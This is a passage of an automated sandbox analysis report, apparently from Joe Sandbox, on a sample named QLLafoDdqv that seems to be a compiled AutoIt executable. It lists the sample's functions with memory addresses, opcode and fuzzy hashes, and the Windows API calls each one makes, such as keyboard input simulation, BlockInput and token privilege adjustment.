              • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
              • Instruction ID: ba0365c1a72ca61a4afb93015a2935d88e6a427ea186bc285cec63f6549ed68a
              • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
              • Instruction Fuzzy Hash: 73020B71E0111D9BDF14CFA9C9806EDFBB2EF48324F254169D919EB384D731A941CB94
              Function 006DCAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: Variable is not of type 'Object'.$p#z
              • API String ID: 0-3775082255
              • Opcode ID: c51b3ba3e65c5e96f5d91a15267fe8a92129cdd6abfe6ba7ffc4acf5b93fc963
              • Instruction ID: c77ace521d97e9d5065aeab2a68c06def175dfd7d0993c73d22dcdbcd5200f6e
              • Opcode Fuzzy Hash: c51b3ba3e65c5e96f5d91a15267fe8a92129cdd6abfe6ba7ffc4acf5b93fc963
              • Instruction Fuzzy Hash: 44327B70D00219DBCF14DF94D895AEDB7B6FF05314F24805AE806AB392D779AE46CBA0
              Function 007468EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
              Download Yara Rule
              APIs
              • FindFirstFileW.KERNEL32(?,?), ref: 00746918
              • FindClose.KERNEL32(00000000), ref: 00746961
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              • Opcode ID: b0fbcef897da9bea61239b0c047e1023915fba8999aefa7a7093640c398d35d2
              • Instruction ID: 2b3f235004075b184e7897b598c60a9ae3230abdf1cd7d8b6e16b88bbccaa9a2
              • Opcode Fuzzy Hash: b0fbcef897da9bea61239b0c047e1023915fba8999aefa7a7093640c398d35d2
              • Instruction Fuzzy Hash: DC1190716042019FD710DF29D484A26BBE5FF85328F14C69EE8698F3A2CB74EC05CB91
              Function 007437B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00754891,?,?,00000035,?), ref: 007437E4
              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00754891,?,?,00000035,?), ref: 007437F4
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorFormatLastMessage
              • String ID:
              • API String ID: 3479602957-0
              • Opcode ID: eeeb3748f0d9b9cd206abbd29b1514b920e9d5f0827959c6d410a24b046f5aba
              • Instruction ID: 451ca3856260a129efc65e0ee2f8adc78b029877127fe934cec231ddd7e37ac2
              • Opcode Fuzzy Hash: eeeb3748f0d9b9cd206abbd29b1514b920e9d5f0827959c6d410a24b046f5aba
              • Instruction Fuzzy Hash: 7CF0E5B06053286AE76117668C8DFEB3AAEEFC4761F004265F509D22C1DAB49944C6B0
              Function 0073B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
              Download Yara Rule
              APIs
              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0073B25D
              • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 0073B270
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: InputSendkeybd_event
              • String ID:
              • API String ID: 3536248340-0
              • Opcode ID: 0b9322a0ada63b926752078078164d882f61f2b2d9f033001b7b2244826bcd80
              • Instruction ID: 6df41ec45da500ad7f6b0bc06ff971cdef3be87976634d45c7f951161a561928
              • Opcode Fuzzy Hash: 0b9322a0ada63b926752078078164d882f61f2b2d9f033001b7b2244826bcd80
              • Instruction Fuzzy Hash: F7F0127180424DABDB059FA1C8057BE7BB4FF04305F148009F955A5192C77D86119F94
              Function 007310BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007311FC), ref: 007310D4
              • CloseHandle.KERNEL32(?,?,007311FC), ref: 007310E9
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AdjustCloseHandlePrivilegesToken
              • String ID:
              • API String ID: 81990902-0
              • Opcode ID: 0c81c028360bf33ce80bfcaa292c82e6c64f4e96744a20b51d712221978ea4f1
              • Instruction ID: 0472cc47743c23b4a69a508b70ba4da402f138558793fee8756d09e48af970e2
              • Opcode Fuzzy Hash: 0c81c028360bf33ce80bfcaa292c82e6c64f4e96744a20b51d712221978ea4f1
              • Instruction Fuzzy Hash: 08E04F32008740AFF7262B12FC05E777BA9EF04310F10C82DF4A6804B1DBA26C90DB14
              Function 0070676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00706766,?,?,00000008,?,?,0070FEFE,00000000), ref: 00706998
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: bafe0fec2148d9f80ad823e64421f9f7561004f523f59739c99b8bdad8f904e5
              • Instruction ID: 7e1ce935d055ed727ac09b44ab553ceba95f5c1b5a756cb68a1575e2e3a477ea
              • Opcode Fuzzy Hash: bafe0fec2148d9f80ad823e64421f9f7561004f523f59739c99b8bdad8f904e5
              • Instruction Fuzzy Hash: D1B10571610608DFDB15CF28C49AB657BE0FB45364F25C658E899CF2E2C339E9A1CB40
              Function 006EB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID: 0-3916222277
              • Opcode ID: 302f7e0a285ee33d16a564a68d366b9222082ee351ff8102c472410c7a6da864
              • Instruction ID: 0a38e2fa34a2571865719cf329d9a6ff479ba65fcd3c584dcf644860f6bfdf72
              • Opcode Fuzzy Hash: 302f7e0a285ee33d16a564a68d366b9222082ee351ff8102c472410c7a6da864
              • Instruction Fuzzy Hash: 11127F71901229DBCB54CF59D881AEEB7F5FF48310F1481AAE809EB255EB349E81CF91
              Function 0074EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
              Download Yara Rule
              APIs
              • BlockInput.USER32(00000001), ref: 0074EABD
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: BlockInput
              • String ID:
              • API String ID: 3456056419-0
              • Opcode ID: f3d81005c38b7611183402324b452e2980b936fdf5a5f03f3ac515f1accfb41a
              • Instruction ID: 40037cca7cd9eb2455f7838ba556cfbcf0cf3592421f0df82704f92a4fce4f06
              • Opcode Fuzzy Hash: f3d81005c38b7611183402324b452e2980b936fdf5a5f03f3ac515f1accfb41a
              • Instruction Fuzzy Hash: 11E01A312002059FC710EF59D804EAAB7E9BF98770F00C41AFD8AC7361DBB4A8408B94
              Function 006F09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
              Download Yara Rule
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,006F03EE), ref: 006F09DA
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: f489ea8c91d0fb0b7a3c1d3df5387af7881b36bf58a62d3a021276c51cd31ab5
              • Instruction ID: affbd668b4b02449cdead1a49988709635f711dc891ddf25beb500da3dd9948e
              • Opcode Fuzzy Hash: f489ea8c91d0fb0b7a3c1d3df5387af7881b36bf58a62d3a021276c51cd31ab5
              • Instruction Fuzzy Hash:
              Function 006F781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: 0
              • API String ID: 0-4108050209
              • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
              • Instruction ID: 49cd43dd53e8c6a144dd8756219a9541778ea1c39d6a0f3090c4c4d325dec89c
              • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
              • Instruction Fuzzy Hash: 6951797160C70D5BDB388968885E7FE67DB9B12380F18052EEB92D7382CA55DE03D35A
              Function 00742046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: 0&z
              • API String ID: 0-2820941700
              • Opcode ID: d13d7ad5f396863204dd0080da75ade720c532cb8c51b8f80897acd95b46c113
              • Instruction ID: 78fa2d245e396c6b82c44dd04dae84c5b4ab51d1a6adbcccf999210eff2e8e03
              • Opcode Fuzzy Hash: d13d7ad5f396863204dd0080da75ade720c532cb8c51b8f80897acd95b46c113
              • Instruction Fuzzy Hash: BD21E7323216118BD728CF79C82367E73E5A794310F148A2EE4A7C37D1DE3AA905CB84
              Function 00706DD9 Relevance: .6, Instructions: 637COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a9c2066cb2894a89233c51479eac4db81d8b812cabec05727c6e5fca42b3365f
              • Instruction ID: 381d433856c0a6ee5eb19534b33c23f731c6521d023dbd8b145d0cc7e36860a5
              • Opcode Fuzzy Hash: a9c2066cb2894a89233c51479eac4db81d8b812cabec05727c6e5fca42b3365f
              • Instruction Fuzzy Hash: 9D32F221D29F418DD7279634CC22335A689AFB73C5F15D737E82AB59AAEB2DD4C38100
              Function 006ECC39 Relevance: .6, Instructions: 635COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5e82e2b8fff1fdea07d106e46cdf284e001a0bed0978d97c4c53d528e9ae46c9
              • Instruction ID: aaca0146c2dc89ad00afd5e2e1306f3546f902c4b8fff4ad2527d53b354d3168
              • Opcode Fuzzy Hash: 5e82e2b8fff1fdea07d106e46cdf284e001a0bed0978d97c4c53d528e9ae46c9
              • Instruction Fuzzy Hash: FA323931A002A58BDF26CF29E490ABD77B2EF55310F38816AE449DB391D63CDD82DB51
              Function 006D7920 Relevance: .6, Instructions: 563COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38307b4a995edd1488a96a089108ad0dd93fb178de2c66cd9a34e98ec2e82bb7
              • Instruction ID: a7fd4614074684c2e14e2281b999083a289a15b8dd61a8c58ccfec64ab8c6b87
              • Opcode Fuzzy Hash: 38307b4a995edd1488a96a089108ad0dd93fb178de2c66cd9a34e98ec2e82bb7
              • Instruction Fuzzy Hash: A7229F70E04609DFDF18CF68C881AEEB7B6FF44300F14462AE816A7391EB39A955CB55
              Function 006D91C0 Relevance: .5, Instructions: 475COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f6643be563c8d9a2d64094b509f957a7733ccbcbf8b5dc94b651717884302cc
              • Instruction ID: 019e2c88f922e2e323763c35d3a9862419e3fe54cc70df31c9e81240140fddc2
              • Opcode Fuzzy Hash: 0f6643be563c8d9a2d64094b509f957a7733ccbcbf8b5dc94b651717884302cc
              • Instruction Fuzzy Hash: 7E02A6B1E0020AEBDB14DF58D881AADB7B2FF44300F118169E8569B3D1EB35EE51CB95
              Function 006F7A4A Relevance: .2, Instructions: 237COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4a27130f7ea7df12b1d90b501ae831a013f3873148f0a08b9036079981984457
              • Instruction ID: 6834b538051ee04cdaa27bc7852b169284fef0925481475f05999aaa2a527a22
              • Opcode Fuzzy Hash: 4a27130f7ea7df12b1d90b501ae831a013f3873148f0a08b9036079981984457
              • Instruction Fuzzy Hash: 5461677120C70E9AEE749E2C8D95BFE2397DF52704F10095EEB42DB381DA51AE42C319
              Function 015C3620 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
              • Instruction ID: d5eafcdf902b49c7eb14c066e91c0c783ad7d0f43893108c38a5c24e302125fa
              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
              • Instruction Fuzzy Hash: 2541C471D1051CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB80
              Function 015C3510 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
              • Instruction ID: 38e298594a109dff80164791ffdc0c1ffe295c91b60008b0942cd833bed0035f
              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
              • Instruction Fuzzy Hash: 1B01A478A00109EFCB84DF98C5909AEF7F5FF48710F208599D819AB741D730AE41DB80
              Function 015C34B0 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
              • Instruction ID: 6cea9cd6e78fdb919727003c431d182a98f5e6932c28420d0ba700e58623b8dc
              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
              • Instruction Fuzzy Hash: 13019278A00109EFCB85DF98C5909AEF7F5FB48710F208599D809AB701D734AE41DB80
              Function 015C1E70 Relevance: .0, Instructions: 6COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
              Function 00752ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
              Download Yara Rule
              APIs
              • DeleteObject.GDI32(00000000), ref: 00752B30
              • DeleteObject.GDI32(00000000), ref: 00752B43
              • DestroyWindow.USER32 ref: 00752B52
              • GetDesktopWindow.USER32 ref: 00752B6D
              • GetWindowRect.USER32(00000000), ref: 00752B74
              • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00752CA3
              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00752CB1
              • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752CF8
              • GetClientRect.USER32(00000000,?), ref: 00752D04
              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00752D40
              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752D62
              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752D75
              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752D80
              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752D89
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752D98
              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752DA1
              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752DA8
              • GlobalFree.KERNEL32(00000000), ref: 00752DB3
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00752DC5
              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0076FC38,00000000), ref: 00752DDB
              • GlobalFree.KERNEL32(00000000), ref: 00752DEB
              • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00752E11
              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00752E30
